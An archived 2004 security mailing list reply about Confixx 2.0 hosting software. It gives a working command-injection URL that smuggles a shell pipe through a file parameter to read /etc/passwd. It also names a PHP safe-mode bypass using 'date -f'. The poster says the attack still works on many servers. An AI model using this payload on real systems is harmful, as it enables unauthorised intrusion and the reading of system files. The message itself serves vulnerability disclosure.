lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040310145253.7831.qmail@mail.krefeld.schulen.net> From: checker at mail.krefeld.schulen.net (checker@...l.krefeld.schulen.net) Subject: Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW In the year 2003 I've successfully tested the following exploit on the sw-soft confixx demoversion http://confixx-demo.sw-soft.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd i am sure - it still works on many servers. The php safemode is not really a protection against this bug because there a several possibilities to skip safemode (e.g. "date -f /etc/passwd").